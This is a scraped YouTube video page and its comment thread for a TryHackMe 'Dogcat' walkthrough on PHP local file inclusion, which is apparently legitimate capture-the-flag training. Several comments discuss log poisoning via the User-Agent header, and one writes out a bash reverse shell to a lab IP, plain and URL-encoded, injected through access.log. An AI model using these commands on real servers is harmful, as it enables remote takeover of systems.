TryHackMe! DOGCAT - PHP Filters for Local File Inclusion

  Рет қаралды 77,428

John Hammond

John Hammond

4 жыл бұрын

If you would like to support me, please like, comment & subscribe, and check me out on Patreon: / johnhammond010
E-mail: johnhammond010@gmail.com
PayPal: paypal.me/johnhammond010
GitHub: github.com/JohnHammond
Site: www.johnhammond.org
Twitter: / _johnhammond

Пікірлер: 95
@tsustyle6263
@tsustyle6263 4 жыл бұрын
Real talk, I learn more from John's videos than I do from any kind of infosec "course". Absolutely brilliant stuff.
@antricks2546
@antricks2546 4 жыл бұрын
Yeah, this stuff is really useful!
@karelmirim5547
@karelmirim5547 4 жыл бұрын
*script finishes in a minute* "It has finished in just under a hour." Interpret howerever you like.
@djhris9533
@djhris9533 4 жыл бұрын
Haha yes
@_JohnHammond
@_JohnHammond 4 жыл бұрын
Whoops! I don't even know what I say when I do these things bahaha
@ari_archer
@ari_archer 3 жыл бұрын
oHHHHHH, this got me confused
@tylercoombs1
@tylercoombs1 2 жыл бұрын
LOL! I kinda did a lazy double take on that one
@jelluh24
@jelluh24 4 жыл бұрын
Can you make a video where you haven't done a tryhackme box in advance? I like watching you go through the problem solving part instead of just showing how you did it before.
@_JohnHammond
@_JohnHammond 4 жыл бұрын
I might start to do some stuff like that on Twitch, so I can fumble and fail and not be too concerned with it. Would that work?
@jelluh24
@jelluh24 4 жыл бұрын
@@_JohnHammond yeah I would definitely watch that!
@tristanwild1313
@tristanwild1313 4 жыл бұрын
@@_JohnHammond that would be great! :D
@prathameshtakane7354
@prathameshtakane7354 4 жыл бұрын
i like this quick highlight of the solution you figured out if i like the highlights i will go to twitch to watch the whole thing, so please keep uploading highlights here, great job.
@novanuke1356
@novanuke1356 4 жыл бұрын
@@_JohnHammond I really enjoyed the one you did on May 20th, I was a little disappointed because I missed it when it was live.
@markgacoka9704
@markgacoka9704 4 жыл бұрын
Terminal: [Finished in 56.9 s] Hammond: Finished in just under an hour...
@_JohnHammond
@_JohnHammond 4 жыл бұрын
Ah jeez. I don't even know what I say when recording. Bahahah
@gamingnerd8684
@gamingnerd8684 4 жыл бұрын
@@_JohnHammond i felt bad cuz it didn't work and i thought it genuinely took an hour
@eklypzn
@eklypzn 4 жыл бұрын
Your vids with your first attempt are my favorite. I enjoy watching you get stumped for a bit and figuring out the next avenue. Thanks for expanding my mind on a regular basis.
@proxikal
@proxikal 2 жыл бұрын
Great playlist so far! One of the best learning experiences I've had so far in this field. Everyone else appears to have practiced every box multiple times before streaming. So if we face any issues at all (as they probably did behind screens) we're in the sinker. However, showing the mistakes and the steps to get around or out of any situation is priceless in my opinion. As it shows the method of thinking behind diagnosing what the issue is and what routes you can take to rectify the situation as a professional does. Keep up the great work man!
@bibigabuyo1654
@bibigabuyo1654 3 жыл бұрын
I so much love the way you explain and how you try several methods. The video is very relatable showing that we are allowed to try and fail and try again.. very very cool specially the Recap in the end. Thanks so much ! 🙏🏻
@_JohnHammond
@_JohnHammond 3 жыл бұрын
Ah that is very sweet, thank YOU! Appreciate all the kind words, thanks for watching!
@guyc10
@guyc10 3 жыл бұрын
That was one of my favorite video you did, awesome learned a lot from it, Thank you for sharing
@junhongchoo5990
@junhongchoo5990 3 жыл бұрын
I was doing similar box yesterday and spent the whole day learning the log poisoning technique (even tho got it working at the end but wasn't fully understand why). Only if I watch this video yesterday then I could have save a day worth of researching. Your video are awesome and very informative for beginner/hobbyist . Looking forward to learn more from you :)
@shadow201011
@shadow201011 4 жыл бұрын
@21:00 It removes the whitespace, because in the Python code you have x.strip(), if you remove strip() function you will get the PHP file with whitespaces in it. I also had to do some utf-8 encoding/decoding before sending it to the server (although I think that's not really important i think), and it worked! Thanks for the great content
@lo-tr2zn
@lo-tr2zn Жыл бұрын
this is some good stuff
@ElliotWeishaar
@ElliotWeishaar 3 жыл бұрын
Loving the videos. Just caught the bug. Loving the fact names that John gives to symbols even more ( '
@sneezeman
@sneezeman 3 жыл бұрын
You could use the php $_GET to curl a reverse shell from your own machine and pipe that to php to get a shell
@kalebfenley1199
@kalebfenley1199 Жыл бұрын
I know it's an old video, but I've been trying to do this CTF all day. Watching other videos, and reading write-ups on this exact one. I couldn't get anything else working until I found your video. I kept breaking my apache logs like you explained. Anyway, good stuff. Keep it up man.
@genezisdj
@genezisdj Жыл бұрын
the big inspirator thxxx jhonn
@erin1569
@erin1569 2 жыл бұрын
I like it even more if you don't know the answer right away, seeing you wander in the dark makes me learn a lot.
@shivangraina9698
@shivangraina9698 4 жыл бұрын
Dude i am learning so much from you.. Thanks 🙏🙇
@manamebob
@manamebob 2 жыл бұрын
awesome content keep up the great work
@IsmaelVazquezJr
@IsmaelVazquezJr 4 жыл бұрын
That thumbnail doe!! 🔥
@VEKTOR299
@VEKTOR299 4 жыл бұрын
Amazing video, very entertained, you are a genius, a total code and hacking wizard
@mateenkiani6858
@mateenkiani6858 3 жыл бұрын
Great stuff!
@camw9354
@camw9354 4 жыл бұрын
Cant wait
@yashithabanu7173
@yashithabanu7173 3 жыл бұрын
Really Great !!!
@coolhandjake
@coolhandjake 3 жыл бұрын
Half the time I don’t know what’s going on but its entertaining watching him hack things with such ease
@maurox1614
@maurox1614 2 жыл бұрын
Code execution using the log file and the user agent is mind-blowing! Where the hell do you find those solutions?? I love the way how you "hackers" think outside de box, you are really genius guys!
@sephmaddock
@sephmaddock Жыл бұрын
I love the way this guy navigates thru the OS. I have Ubuntu, Kali and Windows 10. lol Trying to mastering 3 at the sametime.
@MrRafsan0
@MrRafsan0 4 жыл бұрын
Love your videos. Love From Bangladesh ❤
@HAGSLAB
@HAGSLAB 3 жыл бұрын
I did this room today and had a bumpy ride, then I watched this video and saw you struggle with some of the same things which was kind of nice to be honest 😅
@neilthomas5026
@neilthomas5026 4 жыл бұрын
Very cool as always thanks for making this stuff really helps noobs like me :)
@imofo
@imofo 4 жыл бұрын
Haha why noob :)
@rainerzufall4268
@rainerzufall4268 Жыл бұрын
I love your Python coding in the Videos
@Sami-xv8ve
@Sami-xv8ve 4 жыл бұрын
nooo, what happend with the original one, i watched you make it for hours.
@olivermanyasa9386
@olivermanyasa9386 3 жыл бұрын
Tha was a nice one
@Mustafaq9
@Mustafaq9 3 жыл бұрын
Just a quick question because I'm not sure what I'm missing: why not just send the whole file over in one request as base64 instead of sending it as individual lines?
@danielhemmati
@danielhemmati 4 жыл бұрын
that was epic 😎
@hoodietramp
@hoodietramp Жыл бұрын
Cool thing
@stackoverflow2155
@stackoverflow2155 3 жыл бұрын
I really enjoyed the tutorial and I thought the "mishaps" were actually educational.
@finesseandstyle
@finesseandstyle 3 жыл бұрын
16:37 What's the purpose of base64 encoding? You can write text into a file so what's the issue?
@ProBarokis
@ProBarokis 3 жыл бұрын
so he can escape special characters
@LahcenTahiri
@LahcenTahiri 2 жыл бұрын
that is huge man
@jaywandery9269
@jaywandery9269 6 ай бұрын
This room gave me a hard time
@claudiafischering901
@claudiafischering901 2 жыл бұрын
I checkout if it possible on my apache2 server or if is fixed already...that is scary!
@nikohegeheiskanen
@nikohegeheiskanen 4 жыл бұрын
Pretty sure the & doesnt get url encoded when you put it in the url which breaks stuff so thats probably why the reverse shell wasnt working
@ino145
@ino145 4 жыл бұрын
I really wanna learn this but no idea where to start. I once downloaded Kali a long time ago, but yeah, no idea what I was doing. :D I've always been on Win machines also, so don't know any code etc. I know basic. ls, dir, cd.. And is it still safe to install Kali(and probably a vm)
@thatonesilverfuck6954
@thatonesilverfuck6954 4 жыл бұрын
Protip, urlencoding the first payload you tried 'bash ×××××××' works.
@_JohnHammond
@_JohnHammond 4 жыл бұрын
Oh NICE! Good to know, thank you!
@carbajal17
@carbajal17 4 жыл бұрын
Hi, can you pls provide how urlencoding worked for you? I tried encoding "bash -i >& /dev/tcp/10.1.12.155/9001 0>&1" and got: ..access.log&ext&c=bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.1.12.155%2F9001+0%3E%261 But no go :( , nc lvnp did not respond. Thanks!
@DaniSpeh
@DaniSpeh 2 жыл бұрын
Beginner question: Why do you need to base64 encode it and than after you've uploaded it, decode again? Some source why you have to do this ?
@rlee431
@rlee431 4 жыл бұрын
Great job. How would you rate the difficulty of this box with the ones on the oscp?
@westernvibes1267
@westernvibes1267 4 жыл бұрын
This is a box based on one technique for escalating to rce from lfi. There are tons of techniques to turn lfi to rce. Sometimes through sending a mail to a smtp server with php codes too. This is like 10% of a single oscp exam box. But if you really curious about difficulty of oscp labs and exam boxes. They are easy-medium boxes of hackthebox.
@TheNajuda
@TheNajuda 3 жыл бұрын
How did you know when it was broken, just because it wasn't receiving the variable?, I make a mistake writing the code for that, but it was difficult to spot it, since it do not say any error, the variable just didn't receive any value so didn't show me anything, it did show me the part of : system(): Cannot execute a blank command in so I thought everything was done right and didn't knew i wrote the code wrong was it the same for you or did it show something for you?, thanks for your tutorials they are nice!
@mattplaygamez
@mattplaygamez 3 жыл бұрын
John you don't need to have python. You can also type 'bash -i'
@user-wd3ng2pt3z
@user-wd3ng2pt3z 3 жыл бұрын
thanks bro ,, but i hope to upload scripts file that related with yours videos .
@abdiwahabahmedomar2399
@abdiwahabahmedomar2399 4 жыл бұрын
Wow Good jop 🎉🎉🎉
@andy-bandy
@andy-bandy 4 жыл бұрын
You're a fucking beast, love it
@socomplicated808
@socomplicated808 4 жыл бұрын
can you do the skynet room on tryhackme? would be appreciated?
@hakoo2700
@hakoo2700 3 жыл бұрын
❤🤚
@adamhuk3624
@adamhuk3624 4 жыл бұрын
An hour?? A minute looking at your clock
@user-tz8yw6kg8f
@user-tz8yw6kg8f 4 жыл бұрын
11:50 it may have worked with python, you did (“)” instead of (“”)
@arcanj0
@arcanj0 3 жыл бұрын
That's was hard (for me)
@hyperdrone900
@hyperdrone900 4 жыл бұрын
since you have a rce on that box, why not upload any shell source on a text hosting site like pastebin then curl/wget that file to that box xD
@allandiego1446
@allandiego1446 4 жыл бұрын
this shell doesn't work in pentestbox do you know any way to do it?return the error 101
@weiiswurst
@weiiswurst 4 жыл бұрын
Why do you prefer Sublime Text over VS Code?
@giovannitomczak6826
@giovannitomczak6826 2 жыл бұрын
I keep getting a "fatal flaw" error when accessing the access.log. Anyone else?
@dev__004
@dev__004 Жыл бұрын
My guess is that everyone who did the box broke the access.log atleast one time lol
@0oOskar
@0oOskar 4 жыл бұрын
Ok sorry if this question seems very dumb but I'm just trying to learn, would it be possible to use a tool like gobuster to find the "hidden" addresses on the page? instead of manually looking for them?
@michaelcox722
@michaelcox722 3 жыл бұрын
Yes it would. There's more than one way to skin a cat.
@lordykarus
@lordykarus 4 жыл бұрын
Wizard
@rajeshwaris6663
@rajeshwaris6663 4 жыл бұрын
Try perl rev shell
@Khusyasy
@Khusyasy 3 жыл бұрын
watching this video makes me feel like a hacker, even though i never used linux 🤣
@manjoos4906
@manjoos4906 3 жыл бұрын
what the hell this is medium difficulty??
@SebastianHasch
@SebastianHasch 2 жыл бұрын
'Comment button'
@javadmv1181
@javadmv1181 2 жыл бұрын
you tried a lot, but the reverse shell upload is not that hard in this machine.
@VDViktor
@VDViktor Жыл бұрын
The amount of time someone like John spent on it, the amount of coding involved and techniques used, makes me suspect that this is shouldnt be classified as an "easy" room on THM lol
@huntit4578
@huntit4578 10 ай бұрын
same wtf is that
TryHackMe! Buffer Overflow & Penetration Testing
30:33
John Hammond
Рет қаралды 77 М.
TryHackMe! Looking Glass... with PWNCAT
59:28
John Hammond
Рет қаралды 66 М.
Did you find it?! 🤔✨✍️ #funnyart
00:11
Artistomg
Рет қаралды 110 МЛН
Do you have a friend like this? 🤣#shorts
00:12
dednahype
Рет қаралды 4,2 МЛН
I don’t want to clean this.
11:42
Linus Tech Tips
Рет қаралды 470 М.
All-Army Cyberstakes - XXE Injection!
31:21
John Hammond
Рет қаралды 34 М.
Exploring Ransomware Builders
50:00
Cyber from the Frontlines
Рет қаралды 1 М.
Finding WEIRD Phishing Websites
18:28
John Hammond
Рет қаралды 16 М.
HackTheBox - "Remote" - Umbraco & Windows
48:23
John Hammond
Рет қаралды 81 М.
TryHackMe! Skynet - Wildcard Injection
47:18
John Hammond
Рет қаралды 109 М.
GoogleCTF - Cross-Site Scripting "Pasteurize"
29:21
John Hammond
Рет қаралды 96 М.
TryHackMe! Bypassing Upload Filters & DirtySock
53:38
John Hammond
Рет қаралды 67 М.
Exploiting Tomcat with LFI & Container Privesc - "Tabby" HackTheBox
45:54
I bought the most MINIMALIST Tech ever.
48:11
Mrwhosetheboss
Рет қаралды 2,3 МЛН
Did you find it?! 🤔✨✍️ #funnyart
00:11
Artistomg
Рет қаралды 110 МЛН